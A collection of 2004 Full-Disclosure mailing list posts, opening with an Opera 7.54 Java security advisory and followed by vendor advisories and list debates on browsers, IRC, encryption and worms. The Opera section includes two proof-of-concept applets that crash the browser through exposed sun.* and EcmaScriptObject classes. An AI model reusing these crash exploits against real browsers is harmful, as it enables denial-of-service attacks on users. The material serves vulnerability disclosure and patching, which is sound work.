information gathering (spying) of local identity information and system
configurations as well as causing annoying crash effects.
History
Discovery and vendor informed: 01 Sep 2004
Public Disclosure: 19 Nov 2004
Solution
Opera Software has eliminated the vulnerability in current 7.60 beta
versions. The 7.54 version can be cured by applying a patch to the file
opera.policy to achieve the same effect.
Affected Version
Opera 7.54 for all platforms, although several exploits were only tested on
win32. Prior versions may also be affected.
Problem 1: Problem with Java Policy settings
In contrast to other major browsers which use the Java Plugin, Opera uses
the JRE directly with a proprietary adapter. Opera also introduces it's own
default policy, allowing unprivileged applets access to internal
sun-packages by specifying in Opera.policy:
grant {
permission java.lang.RuntimePermission accessClassInPackage.sun.*;
};
This opens the gate to some undocumented functionality and violates Sun's
guidelines for secure java programming. These lines should be commented out
to get rid of the vulnerabilities shown in the later text. An attacker could
crash the browser or do some other annoying things harmful to the user. Just
like with the following proof-of-concept to trigger a native debug
assertion:
import sun.awt.font.*;
public class Opera754FontCrashApplet extends java.applet.Applet{
public void start() {
int j =
javax.swing.JOptionPane.showConfirmDialog(null,Illegalaccess.org | Step1
Opera 754 FontCrash, wanna crash? );
if (j == 0) {
NativeFontWrapper.getFullNameByIndex(Integer.MIN_VALUE);
NativeFontWrapper.getFullNameByIndex(Integer.MAX_VALUE);
}
}
}
The default java appletviewer which implements the same security mechanisms
than the Java plugin complains with the following message instead of
executing the method invocation:
java.security.AccessControlException: access denied
(java.lang.RuntimePermission
accessClassInPackage.sun.awt.font)
at
java.security.AccessControlContext.checkPermission(AccessControlConte
xt.java:269)
at
java.security.AccessController.checkPermission(AccessController.java:
401)
at
java.lang.SecurityManager.checkPermission(SecurityManager.java:524)
at
java.lang.SecurityManager.checkPackageAccess(SecurityManager.java:149
1)
at
sun.applet.AppletSecurity.checkPackageAccess(AppletSecurity.java:190)
at sun.applet.AppletClassLoader.loadClass(AppletClassLoader.java:119)
at java.lang.ClassLoader.loadClass(ClassLoader.java:235)
at java.lang.ClassLoader.loadClassInternal(ClassLoader.java:302)
at Opera754FontCrashApplet.start(Opera754FontCrashApplet.java:9)
at sun.applet.AppletPanel.run(AppletPanel.java:377)
at java.lang.Thread.run(Thread.java:534)
Opera allows all untrusted applets access to these classes by disabling the
need to acquire a access permission for sun packages.
In general we recommend the Opera programmers to switch the opera java
architecture to the standards based approach and use the java plugin.
Problem 2: JRE Packaging
Opera 754 which was released Aug 5,2004 is vulnerable to the XSLT processor
covert channel attack, which was corrected with JRE 1.4.2_05 [released in
July 04], but in disadvantage to the users the opera packaging guys chose to
bundle the JRE 1.4.2_04, being quite aware of the offical Sun advisory
(http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57613) reporting
this issue, which was released a few days earlier.
Problem 3: Internal pointer DoS exploitation:
Opera.jar contains the opera replacement of the java plugin. It therefore
handles communication between javascript and the Java VM via the liveconnect
protocol. The public class EcmaScriptObject exposes a system memory pointer
to the java address space, by constructing a special variant of this type an
internal cache table can be polluted by false entries that infer proper
function of the JSObject class and in the following proof-of-concept crash
the browser.
import netscape.javascript.*;
import com.opera.*;
public class Opera754EcmaScriptApplet extends java.applet.Applet{
public void start() {
PluginContext pc = (PluginContext)this.getAppletContext();
int jswin= pc.getJSWindow();
int esrun= pc.getESRuntime();
EcmaScriptObject eso4 = EcmaScriptObject.getObject (jswin,1);
try {
JSObject js = JSObject.getWindow(this);
System.out.println(js);
}
catch (Exception e) {
e.printStackTrace();
}
}
}
Problem 4: Exposure of location of local java installation
Sniffing the URL classpath allows to retrieve the URLs of the bootstrap
Re: [Full-Disclosure] Gmail anomaly
ifconfig_xl0 wrote: If you open two gmail accounts in two different firebird/fox browsers the first account logged into after a refresh becomes the second acccount. Or if you send an e-mail with the second account, it may send as the first and refresh back as account1. So if you login with GmailAccount1 and then open another browser and log into GA2, go back to GA1 browser and hit refresh, GA1 will be in the mailbox of GA2. This obviously is not a security risk because the mailbox was already logged into, but I still thought it was a weird thing to do. It doesnt act that way with internet exploder though so it must be something with Firefox ... In Firefox there is only ever one instance of the executable, and all windows share session cookies (and http auth, which has similar differences between IE and Firefox). You get the same behavior from IE if you open new windows from existing browser windows (crucial for web apps to work). You get a new process that does not share session information if you launch a new window from the OS (Desktop link, start menu, command-line, etc). In practice the difference doesn't matter to the average user, but there are lots of Bugzilla duplicates filed by power users asking Mozilla to mimic the IE behavior. It becomes a minor security problem in conjunction with sites that assume the IE behavior and which lazily instruct the user to close the browser window to completely log out rather than reset the session info from the server side. This is insufficient even for IE if the user opens multiple windows using Ctrl+N or the File|New menu item. -Dan Veditz ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Corsaire Security Advisory - Netopia Timbuktu remote buffer overflow issue
-- Corsaire Security Advisory -- Title: Netopia Timbuktu remote buffer overflow issue Date: 20.07.04 Application: Timbuktu v7.0.3 Environment: Mac OS X (10.1, 10.2, 10.3) Author: Stephen de Vries [EMAIL PROTECTED] Audience: General release Reference: c040720-001 -- Scope -- The aim of this document is to define a vulnerability in the Timbuktu product for Mac OS X, as supplied by Netopia [1], that allows a remote attacker to crash the application and effectively deny service to legitimate users. -- History -- Discovered: 20.07.04 Vendor notified: 27.08.04 Document released: 19.11.04 -- Overview -- The Timbuktu software is shipped as a client/server application that allows remote users to access the desktop of a host system. The server component of this application is vulnerable to a remote buffer overflow vulnerability that, when exploited, causes the server process to crash. -- Analysis -- The server process runs with root privileges on the host Mac OS X and listens for client connections on TCP port 407. By making a number of concurrent connections to this port and repeatedly sending a particular string of data, a memory buffer is overwritten and the server process crashes. -- Recommendations -- Upgrade to version v7.0.4 of the Timbuktu application. -- CVE -- The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-0810 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardises names for security problems. -- References -- [1] http://www.netopia.com -- Revision -- a. Initial release. b. Minor detail revision. -- Distribution -- This security advisory may be freely distributed, provided that it remains unaltered and in its original form. -- Disclaimer -- The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. Corsaire accepts no responsibility for any damage caused by the use or misuse of this information. -- About Corsaire -- Corsaire are a leading information security consultancy, founded in 1997 in Guildford, Surrey, UK. Corsaire bring innovation, integrity and analytical rigour to every job, which means fast and dramatic security performance improvements. Our services centre on the delivery of information security planning, assessment, implementation, management and vulnerability research. A free guide to selecting a security assessment supplier is available at http://www.penetration-testing.com Copyright 2004 Corsaire Limited. All rights reserved. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] SecurityForest - Public Release #1
Yeah, I'd like for my country to accummulate all the available computer security knowledge too...one heck of a competative advantage to have. Registrant: Alon Swartz Har Sinai St Raanana, NA 43307 Israel Registered through: GoDaddy.com Domain Name: SECURITYFOREST.COM Created on: 14-Sep-04 Expires on: 14-Sep-05 Last Updated on: 14-Sep-04 Administrative Contact: Swartz, Alon [EMAIL PROTECTED] Har Sinai St Raanana, NA 43307 Israel 97745657 Fax -- Technical Contact: Swartz, Alon [EMAIL PROTECTED] Har Sinai St Raanana, NA 43307 Israel 97745657 Fax -- Domain servers in listed order: NS1.EVERYDNS.NET NS2.EVERYDNS.NET Pity the US is so busy scaring the population that they have no time to come up with ideas like this... -- Greg On or about 2004.11.19 12:41:29 +, [EMAIL PROTECTED] ([EMAIL PROTECTED]) said: Community Website: http://www.securityforest.com Community IRC channel: irc://irc.unixgods.net:/securityforest Table of contents = Summary The Open Source Idea Tree's in the Forest ExploitTree ToolTree TutorialTree LinkTree GreenHouse Thanks Summary === SecurityForest.com is a collaboratively edited Forest consisting of Trees which anyone can contribute to. SecurityForest's trees are specific security repositories that are categorized for practical reasons. The technologies currently in use in these repositories are based on Wiki technology and CVS (Concurrent Versioning System) technology. Depending on the species of the tree - the suitable technology will be used. SecurityForest.com is a collection of repositories (trees) for the community - by the community. In other words - the updating, modifying and improving can be done by anyone in the community. This public release is posted at http://www.securityforest.com/wiki/index.php?title=SecurityForest_-_Public_Release_no.1 The Open Source Idea The basic idea behind Open Source is very simple: When people can read, modify and improve a piece of software, the software evolves. People improve it, people adapt it, people fix bugs. And this can happen at a speed that, if one is used to the slow pace of conventional development, seems astonishing. We at SecurityForest have learned that this rapid evolutionary process produces better results than the traditional closed model, in which only very few people improve the Security Repositories and everybody else must use what these individuals have come across and added. SecurityForest is not only based on OpenSource software, but itself is opensource meaning the updating, modifying and improving can be done by anyone in the community. Tree's in the Forest SNIP -- Gregory A. Gilliss, CISSP E-mail: [EMAIL PROTECTED] Computer Security WWW: http://www.gilliss.com/greg/ PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
I'm not a Win based guy (troll?) - Un*x here - and even I was offended by #1. There is such a thing as runas for Windows. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of devis Sent: Friday, November 19, 2004 11:10 AM Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox This message is primarily destined to all MS trolls, no matter their levels, and i can see so many in this list that i am happy to target a large audience. Please run some unix or at least read about the unix permission system, and lets pray god this sheds some light in your mono cultured brains. Here are the relevant points: 1) Despite recent ameliorations of MS ( multi user finally, permissions ... ) and some effort at making the system more secure, something very important is still left out: The first default user of the MS computer is made an administrator. This comes down to giving uid0 to ur first unix user. Unix does NOT do that. It requieres you to use su and become root ( administrator ) after proper credentials submission ( password ). The first user is NOT and administrator, and any recent Unix documentation will insist on the danger of running as root(admin). Unix keeps the admin account well separated from the user account, which MS DOESN'T, despite all wrong arguments i read on this list. VERY BAD practice generally. So its user friendly, as the user has admin rights and can therefore install and remove software and change major configuration. Majority of users don't and will never know there is an 'administrator' user that hides from their eyes. This little detail that apparently Ms people can't 'understand' is a huge step. Please install a proper unix, create 2 accounts and try to read the home directory of the second user from the first. 2) After all, they don;t need to know . You're on a need to know basis job Do MS really think the users are stupid ? Do understanding different IDs/ roles / accounts on a computer that much of a tough message to pass to the end user ? Isn't security important and supposedly the goal of recent MS developpements ? If they really did target security, their efforts will have been into making the user understand that he should be admin to install programs, and a non priviledged user to surf the web. IS that that hard to understand ? And that much hidden into high IT security professionnal unreachable knowledge ? I don;t think so. Doesn't a company such as MS has enough ressources to make that a priority and educate the users ? Off course it has. Just not very 'commercially' friendly as if user then understand roles, it might requires less Anti virus, personnal firewall and other bullshit FUD's scareware ( Yes its scareware, and it is the best selling software category OF ALL times of software history ). This is why, Firefox being independant from this OS that carries 60 of its code base as being legacy code for older system hardware and backward compatibility, is likely more secure than the in house integrated application. Now if u are running Firefox as an administrator .don't be surprised if something happens. Don;t blame the software, but your poor security practices. Lets not hide from ourselves whats needed from MS to reach modern world security: a complete rewrite, and a ditch of old Dos base and the 20 years old legacy code. Hopes that clears things. Rafel Ivgi, The-Insider wrote: Firefox is not intgrated to the OS, because it doesn't have an OS. Its just a trimmed Mozilla for windows.. However Mozilla in Linux is integrated at some level...so they are just the same as I.E. Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: [EMAIL PROTECTED] - Prevention is the best cure! - Original Message - From: john morris [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, November 14, 2004 3:34 PM Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox Firefox avoids several fundamental design flaws of IE, in that: -Firefox is not integrated into Windows, and thus closes holes allowing access to the OS. -Firefox does not support ActiveX JavaVM or VBScript, three Microsoft proprietary technologies that are responsible for many security holes. -Firefox does not allow for the invasion of your system by adware and spyware just by visiting a website. (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html --- This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm) ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-Disclosure] Time Expiry Alogorithm??
On Fri, 19 Nov 2004, Gautam R. Singh wrote: I was just wondering is there any encrytpion alogortim which expires with time. For example an email message maybe decrypted withing 48 hours of its delivery otherwise it become usless or cant be decrypted with the orignal key No. If a certain deterministic computation (e.g. decryption) can be made in time T, then it can be made in any time T' T. Even if the computation needs cooperation by your computer that refuses to cooperate when the time limit expires (e.g. the recipient of the message needs to ask you for an extra key), you can always do the computation once and save the result (e.g. the plaintext). Well, I admit, this holds unless your computer has been possesed by Palladium (and is not *your* computer anymore). On the other hand, the power of hardware as well as the knowledge of cryptanalysis oincreases as the time passes, ergo any cipher is going to expire...in the sense someone will become able to break it and recover the plaintext without the (a priori) knowledge of the encryption key. --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] Resistance is futile. Open your source code and prepare for assimilation. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Time Expiry Alogorithm??
On Fri, 19 Nov 2004 13:09:19 +0530, Gautam R. Singh said: I was just wondering is there any encrytpion alogortim which expires with tim e. For example an email message maybe decrypted withing 48 hours of its delivery otherwise it become usless or cant be decrypted with the orignal key So now it's 3 weeks later, and I can't read the email... So I set the date on the PC back 20 days, and now it's within 48 hours of delivery. Now, what was this about unreadable? You really can't make this dog hunt without a tamper-proof time source (a smart card or dongle or similar). (And yes, I know they're not *REALLY* tamper-proof - but getting into a smart card is a lot harder than resetting the date... ;) pgp1WmJtea3Lu.pgp Description: PGP signature
Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida
--On Friday, November 19, 2004 12:12:10 AM + Jason Coombs [EMAIL PROTECTED] wrote: http://www.computerworld.com/governmenttopics/government/policy/story/0,1 0801,97614,00.html?nas=PM-97614 I wouldn't trust anything coming out of Bezerkley without confirmation from competent researchers elsewhere. Furthermore, their more esteemed colleagues at CalTech already disagree with them. http://www.vote.caltech.edu/Reports/Florida_discrepancy3.pdf Even *if* they are correct (which is at least debateable) the 130,000 vote discrepancy they argue for won't overcome Bush's lead of 380,000, so this is, at best, an academic exercise. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Why is IRC still around?
Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
On Thu, 18 Nov 2004, rexolab wrote: VulnDiscovery:2003/05/21 Release Date :2004/11/17 Surely you're joking, Mr. Gangstuck. You can't seriously be telling us you sat on this for no less than 18 months, without telling anybody about it. Actually, I somewhat doubt you even discovered this yourself --- what with this very bug having been posted to cscope's bugtracker on 2004-11-09. Status :vendor has just been notified. Actually, we've been notified 11 days ago, and apparently not by you. First, the temporary directory (P_tmpdir=/tmp) is badly handled in every myfopen() internal call. [... there doesn't seem to be a second, to that first...] Anyway, you're right, the vulnerability is there. Unfortunately your patch is not quite sufficient to close it, because you overlooked that temp2, one of the two predictable filenames, is also used to construct an output redirection for a shell command run by cscope. -- Hans-Bernhard Broeker ([EMAIL PROTECTED]) Even if all the snow were burnt, ashes would remain. 2#Mime.822 Description: Binary data AdmID:E14A44596E9AD732AE51498828ABE563
[Full-Disclosure] Corsaire Security Advisory - Danware NetOp Host multiple information disclosure issues
-- Corsaire Security Advisory -- Title: Danware NetOp Host multiple information disclosure issues Date: 19.06.04 Application: Danware NetOp prior to 7.65 build 2004278 Environment: Windows NT/2000/2003/XP/98 Author: Martin O'Neal [EMAIL PROTECTED] Audience: General release Reference: c040619-001 -- Scope -- The aim of this document is to clearly define several vulnerabilities in the NetOp Host product, as supplied by Danware Data A/S [1], that disclose information about the host that would be of use to an attacker. -- History -- Discovered: 19.06.04 (Martin O'Neal) Vendor notified: 23.06.04 Document released: 19.11.04 -- Overview -- The Danware NetOp Host and Guest products provide remote control capabilities for a variety of operating systems. The data exchange between the Guest and Host can be protected by both authentication and encryption, but even with these options enabled the NetOp proprietary protocol can still disclose the hostname, username and local IP address of the host system. -- Analysis -- The NetOp Host and Guest products use a number of standard transport protocols (such as UDP, TCP and IPX) to encapsulate a proprietary data exchange through which remote control services are provided. This proprietary exchange can be protected by a number of optional features, such as authentication and data encryption. However, early on in the session initiation process (prior to both authentication and encryption being enforced), it is still possible for the hostname, username and local IP address of the host system to be disclosed. If a valid NetOp HELO request is sent to the host, then it responds with a packet that may contain one or more of the NetOp hostname, username and local IP address value. Although the hostname option can be overridden, the default setting is to use Windows computer name. If enabled, the username returned will be the name of the current logged in user (if any). Additionally, if the system is protected by a firewall or other device that provides NAT services between private and public address ranges, then the private addressing information will be disclosed. The NetOp products provide an option to disable making this information public, however in versions prior to 7.65 build 2004278 this does not work as intended, and can be bypassed with the use of a custom HELO request. Although none of these disclosures are critical in themselves, they provide additional information that may be combined with other vulnerabilities to launch further attacks against the host. -- Recommendations -- Upgrade to NetOp 7.65 build 2004278. Under the options Host Name tab, uncheck the Public Host name option. If upgrading to NetOp 7.65 build 2004278 is not feasible, the following workaround eliminates most disclosures of the computer and user name, but does not protect against disclosing the private addressing through a NAT gateway: Under the options Host Name tab, select the Enter name or leave name field blank radio button, and uncheck both the Public Host name and Enable User Name options. In the name entry field then appearing on the main program screen, actually leave the name field blank. For those who are unsure if they have NetOp installed within their environment, or whether the configuration options are correctly configured, Corsaire (in collaboration with Danware) have provided a NASL signature for Nessus [2] that will provide the appropriate positive verification. -- CVE -- The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-0950 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardises names for security problems. -- References -- [1] http://www.danware.com [2] http://www.nessus.org -- Revision -- a. Initial release. -- Distribution -- This security advisory may be freely distributed, provided that it remains unaltered and in its original form. -- Disclaimer -- The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. Corsaire accepts no responsibility for any damage caused by the use or misuse of this information. -- About Corsaire -- Corsaire are a leading information security consultancy, founded in 1997 in Guildford, Surrey, UK. Corsaire bring innovation, integrity and analytical rigour to every job, which means fast and dramatic security performance improvements. Our services centre on the delivery of information security planning, assessment, implementation, management and vulnerability research. A free guide to selecting a security assessment supplier is available at http://www.penetration-testing.com Copyright 2004 Corsaire Limited. All rights reserved. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sober.I worm is here
On Fri, 19 Nov 2004 11:22:31 -0500, KF_lists [EMAIL PROTECTED] wrote: can you define medium sized epidemic? Any new features / functionality? Not too much, except for the fact that it also arrives with the following attachment extenstions: .doc, .txt, and .word Which are not typically blocked by layer 7 aware firewalls. Whereas, the biggies .scr, .pif, .exe, .com, .bat, etc., are usually blocked. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
Windows doesn't tell you about the Admin account and makes the default user a Admin. That isn't best method as you know. RunAs is great..but that is only good once you create a normal user - and then delete your new default user. Or you log in in Administrator and take away the full control of the default user. Easy for the average window user? Nope. If it was Microsoft would make the default user (note USER) and then let you configure the Admin account on start. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Crotty, Edward Sent: Friday, November 19, 2004 12:13 PM To: [EMAIL PROTECTED] Subject: RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox I'm not a Win based guy (troll?) - Un*x here - and even I was offended by #1. There is such a thing as runas for Windows. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of devis Sent: Friday, November 19, 2004 11:10 AM Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox This message is primarily destined to all MS trolls, no matter their levels, and i can see so many in this list that i am happy to target a large audience. Please run some unix or at least read about the unix permission system, and lets pray god this sheds some light in your mono cultured brains. Here are the relevant points: 1) Despite recent ameliorations of MS ( multi user finally, permissions ... ) and some effort at making the system more secure, something very important is still left out: The first default user of the MS computer is made an administrator. This comes down to giving uid0 to ur first unix user. Unix does NOT do that. It requieres you to use su and become root ( administrator ) after proper credentials submission ( password ). The first user is NOT and administrator, and any recent Unix documentation will insist on the danger of running as root(admin). Unix keeps the admin account well separated from the user account, which MS DOESN'T, despite all wrong arguments i read on this list. VERY BAD practice generally. So its user friendly, as the user has admin rights and can therefore install and remove software and change major configuration. Majority of users don't and will never know there is an 'administrator' user that hides from their eyes. This little detail that apparently Ms people can't 'understand' is a huge step. Please install a proper unix, create 2 accounts and try to read the home directory of the second user from the first. 2) After all, they don;t need to know . You're on a need to know basis job Do MS really think the users are stupid ? Do understanding different IDs/ roles / accounts on a computer that much of a tough message to pass to the end user ? Isn't security important and supposedly the goal of recent MS developpements ? If they really did target security, their efforts will have been into making the user understand that he should be admin to install programs, and a non priviledged user to surf the web. IS that that hard to understand ? And that much hidden into high IT security professionnal unreachable knowledge ? I don;t think so. Doesn't a company such as MS has enough ressources to make that a priority and educate the users ? Off course it has. Just not very 'commercially' friendly as if user then understand roles, it might requires less Anti virus, personnal firewall and other bullshit FUD's scareware ( Yes its scareware, and it is the best selling software category OF ALL times of software history ). This is why, Firefox being independant from this OS that carries 60 of its code base as being legacy code for older system hardware and backward compatibility, is likely more secure than the in house integrated application. Now if u are running Firefox as an administrator .don't be surprised if something happens. Don;t blame the software, but your poor security practices. Lets not hide from ourselves whats needed from MS to reach modern world security: a complete rewrite, and a ditch of old Dos base and the 20 years old legacy code. Hopes that clears things. Rafel Ivgi, The-Insider wrote: Firefox is not intgrated to the OS, because it doesn't have an OS. Its just a trimmed Mozilla for windows.. However Mozilla in Linux is integrated at some level...so they are just the same as I.E. Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: [EMAIL PROTECTED] - Prevention is the best cure! - Original Message - From: john morris [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, November 14, 2004 3:34 PM Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox Firefox avoids several fundamental design flaws of IE, in that:
[Full-Disclosure] Addendum, recent Linux = 2.4.27 vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, while looking at the changelog for 2.4.28, I've found, that a bug I independently came over some days ago has been fixed in that release: David S. Miller: o [AF_UNIX]: Serialize dgram read using semaphore just like stream That fixes missing serialization in unix_dgram_recvmsg(). I was slightly suprised reading the 2.4.27 code and I strongly believe that the flaw is fully exploitable to gain elevated privileges. There is a subtle race condition finally permitting a non-root user to increment (up to 256 times) any arbitrary location(s) in kernel space. The condition is not easy to exploit since an attacker must trick kmalloc() to sleep on allocation of a special chunk of memory and then convince the scheduler to execute another thread. But it is feasible. Conclusion: update as quick as possible to 2.4.28. - -- Paul Starzetz iSEC Security Research http://isec.pl/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFBnkjiC+8U3Z5wpu4RAiCJAKCpqAD3jD/Ih6CSVxOUW0wnkXVY8QCgs584 x03r/RbphAViQPJrM8Fqj28= =Adi4 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
dear j0e, all i wanted to say is that there are minorities in the real world, who don't load a browser or even graphics and they don't need anyone to let them. i believe these minorities in real world can do more things than the windoze lusers (whose main purpose is to be free shell providers), while enjoying all the fun that the windoze lusers may have. -- Pro-Choice Let j03 choose if he even wants a browser loaded - make b1l1 a blowjob. thanks! On Fri, Nov 19, 2004 at 11:09:28AM -0500, joe wrote: Georgi, you obviously aren't in touch with the real world if you don't realize which OS and browser comprise a vast majority of the market. That ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
That's because the Internet is free and no one can control what survives on it. What survives isn't what is *ethical* but what is *useful*. And IRC is very useful for some people, so it's here to stay. The problem is not IRC; the problem is the misuse some people make of it. We cannot make knives dissapear, because they are useful; instead, we must get rid of people that uses knives to kill. - Original Message - From: Danny [EMAIL PROTECTED] To: Mailing List - Full-Disclosure [EMAIL PROTECTED] Sent: Friday, November 19, 2004 2:40 PM Subject: [Full-Disclosure] Why is IRC still around? Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Sober.I worm is here
It arrives at .doc, .txt and .word? Where are you seeing that? It can't be very dangerous as a TEXT file. As far as I know it uses the normal double extensions tricks. Any good email filter should pick this up and you should be fine. Anyone that just clicks on random attachments in their e-mail and doesn't have anti-virus, should get infected. At least, they are letting someone that knows something use your computer for something..lol j/k -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Danny Sent: Friday, November 19, 2004 11:07 AM To: KF_lists Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Sober.I worm is here On Fri, 19 Nov 2004 11:22:31 -0500, KF_lists [EMAIL PROTECTED] wrote: can you define medium sized epidemic? Any new features / functionality? Not too much, except for the fact that it also arrives with the following attachment extenstions: .doc, .txt, and .word Which are not typically blocked by layer 7 aware firewalls. Whereas, the biggies .scr, .pif, .exe, .com, .bat, etc., are usually blocked. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Time Expiry Alogorithm??
Pavel Kankovsky wrote: If a certain deterministic computation (e.g. decryption) can be made in time T, then it can be made in any time T' T. This is true for breaking a cipher by brute force, but it doesn't account for (stop looking at me) somehow incorporating a timestamp into the encryption scheme to prevent 'legit' decryption after a certain time. Note that what Gautam wants, namely a time-expiring cipher, cannot exist without some third party to provide validation and a timebase. This is what Kerberos does. Otherwise I can just set the clock back on my system and decrypt your damn message anyway. On the other hand, the power of hardware as well as the knowledge of cryptanalysis oincreases as the time passes, ergo any cipher is going to expire...in the sense someone will become able to break it and recover the plaintext without the (a priori) knowledge of the encryption key. I'm going to disagree as politely as possible. As an example, using RSA with 1024 bit keys allows for around 10^150 possible primes. Compare this to the 10^70 some atoms in the known universe to see how disgustingly big that number is. Cracking this encryption scheme by searching the keyspace is laughable. Increase the keysize even a little bit from that and there are arguments that the universe doesn't even hold enough *energy* to allow for searching that kind of keyspace. Now the other possibility: That somebody discovers a better way to factor primes (please don tinfoil hats before replying to tell me that the NSA has already done this, in Area 51, with help from Elvis). Mathematically, this is a very remote possibility, as factoring primes is probably an NP problem, and P is probably not NP. Neither of these has been proven, however. Even allowing for the miniscule possibility that there is a shortcut to factoring primes, that doesn't necessarily mean that factoring huge primes will be an easy task. Using larger keys will still provide a measure of security. //Anders The classic crypto primer: http://www.cyphernet.org/cyphernomicon/chapter2/2.5.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Sober.I worm is here
How does it infect somebody if it's using a .txt file? Ron Bowes Information Protection Centre Government Of Manitoba 204-945-1594 -Original Message- From: Danny [mailto:[EMAIL PROTECTED] Sent: Friday, November 19, 2004 11:07 AM To: KF_lists Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Sober.I worm is here On Fri, 19 Nov 2004 11:22:31 -0500, KF_lists [EMAIL PROTECTED] wrote: can you define medium sized epidemic? Any new features / functionality? Not too much, except for the fact that it also arrives with the following attachment extenstions: .doc, .txt, and .word Which are not typically blocked by layer 7 aware firewalls. Whereas, the biggies .scr, .pif, .exe, .com, .bat, etc., are usually blocked. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
Microsoft integration: You remove the application that plays MPEG movies from a system that has never needed to play MPEG movies, and never will need to - and your system won't boot anymore. Example - Anyone with XP, do a search for mplayer2.exe? What is this you ask? It is media player 6.4 =) You only think you upgraded to Media player 10..lol -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
